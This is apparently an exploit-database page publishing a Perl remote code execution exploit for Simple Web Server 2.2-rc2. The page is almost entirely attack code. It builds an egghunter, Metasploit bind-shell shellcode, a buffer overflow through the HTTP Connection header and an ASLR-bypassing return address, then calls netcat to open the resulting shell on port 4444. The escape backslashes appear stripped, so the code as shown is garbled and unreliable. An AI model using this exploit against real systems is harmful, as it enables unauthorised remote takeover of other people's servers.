[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Simple Web Server 2.2-rc2 ASLR Bypass Exploit
# Published : 2012-08-28
# Author :
# Previous Title : Sflog! CMS 1.0 Arbitrary File Upload Vulnerability
# Next Title : SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
use IO::Socket;
# Exploit Title: SWS 2.2-rc2 - Remote code execution Egghunting + ASLR bypass
# Date: 28/8/2012
# Special Regards to Mr.pr0n ,Corelan team , immunity u guys are first !!! based on a POC by MR. Pr0n
# Author: pole
# Tested on Windows 7 32bit
# NOTE : If exploit is not running properly configure the server on other http ports like here i have used #8000 http ... and keep checking the server is "GREEN" enabled !
print "Exploit by Dhruval n";
if (@ARGV != 2)
{
print "n[-] Usage: $0 <target ip> <port> nn";
exit();
}
$target = $ARGV[0]; # Target IP
$port = $ARGV[1]; # Target port
$egghunter =
"x66x81xCAxFFx0Fx42x52x6Ax02".
"x58xCDx2Ex3Cx05x5Ax74xEFxB8".
"w00t". # The 4 byte tag!
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
# MSF windows/shell_bind_tcp LPORT=4444
$shellcode =
"xdaxc5xd9x74x24xf4x2bxc9xbax3ax04xccxb6x5e".
"xb1x56x31x56x19x83xeexfcx03x56x15xd8xf1x30".
"x5ex95xfaxc8x9fxc5x73x2dxaexd7xe0x25x83xe7".
"x63x6bx28x8cx26x98xbbxe0xeexafx0cx4exc9x9e".
"x8dx7fxd5x4dx4dx1exa9x8fx82xc0x90x5fxd7x01".
"xd4x82x18x53x8dxc9x8bx43xbax8cx17x62x6cx9b".
"x28x1cx09x5cxdcx96x10x8dx4dxadx5bx35xe5xe9".
"x7bx44x2axeax40x0fx47xd8x33x8ex81x11xbbxa0".
"xedxfdx82x0cxe0xfcxc3xabx1bx8bx3fxc8xa6x8b".
"xfbxb2x7cx1ex1ex14xf6xb8xfaxa4xdbx5ex88xab".
"x90x15xd6xafx27xfax6cxcbxacxfdxa2x5dxf6xd9".
"x66x05xacx40x3exe3x03x7dx20x4bxfbxdbx2ax7e".
"xe8x5dx71x17xddx53x8axe7x49xe4xf9xd5xd6x5e".
"x96x55x9ex78x61x99xb5x3cxfdx64x36x3cxd7xa2".
"x62x6cx4fx02x0bxe7x8fxabxdexa7xdfx03xb1x07".
"xb0xe3x61xefxdaxebx5ex0fxe5x21xe9x08x2bx11".
"xb9xfex4exa5x2fxa2xc7x43x25x4ax8exdcxd2xa8".
"xf5xd4x45xd3xdfx48xddx43x57x87xd9x6cx68x8d".
"x49xc1xc0x46x1ax09xd5x77x1dx04x7dxf1x25xce".
"xf7x6fxe7x6fx07xbax9fx0cx9ax21x60x5bx87xfd".
"x37x0cx79xf4xd2xa0x20xaexc0x39xb4x89x41xe5".
"x05x17x4bx68x31x33x5bxb4xbax7fx0fx68xedx29".
"xf9xcex47x98x53x98x34x72x34x5dx77x45x42x62".
"x52x33xaaxd2x0bx02xd4xdaxdbx82xadx07x7cx6c".
"x64x8cx8cx27x25xa4x04xeexbfxf5x48x11x6ax39".
"x75x92x9fxc1x82x8axd5xc4xcfx0cx05xb4x40xf9".
"x29x6bx60x28x23";
$junk = "x41" x (2048 - length("w00tw00t") - length($shellcode));
$ret = pack('V',0x6FC8E251); # CALL ESP - libstdc++-6.dll Non Aslr
#$ret = pack('V',0x7C82385D); #call ESP
#$ret = pack ('V',0x75560D1B); #call ESP ASLR AWARE :)
$nops = "x90" x 20; # 20 nops.
$exploit = $junk."w00tw00t".$shellcode.$ret.$nops.$egghunter;
if ($socket = IO::Socket::INET->new
(PeerAddr => $target,
PeerPort => $port,
Proto => "TCP"))
{
$header =
"GET / HTTP/1.1rn".
"Host: ".$target." rn".
"Connection:".$exploit."rn";
print "n[+] Sending buffer (".(length($exploit))." bytes) to: $target:$port n";
print $socket $header."rn";
sleep(1);
close($socket);
print "[+] Exploitation Done!n";
print "[+] Please, wait couple of sec ...n";
sleep(1);
print "[+] Got shell?nn";
$command = "nc $target 4444";
system ($command);
}
else
{
print "[-] Connection to $target failed!n";
}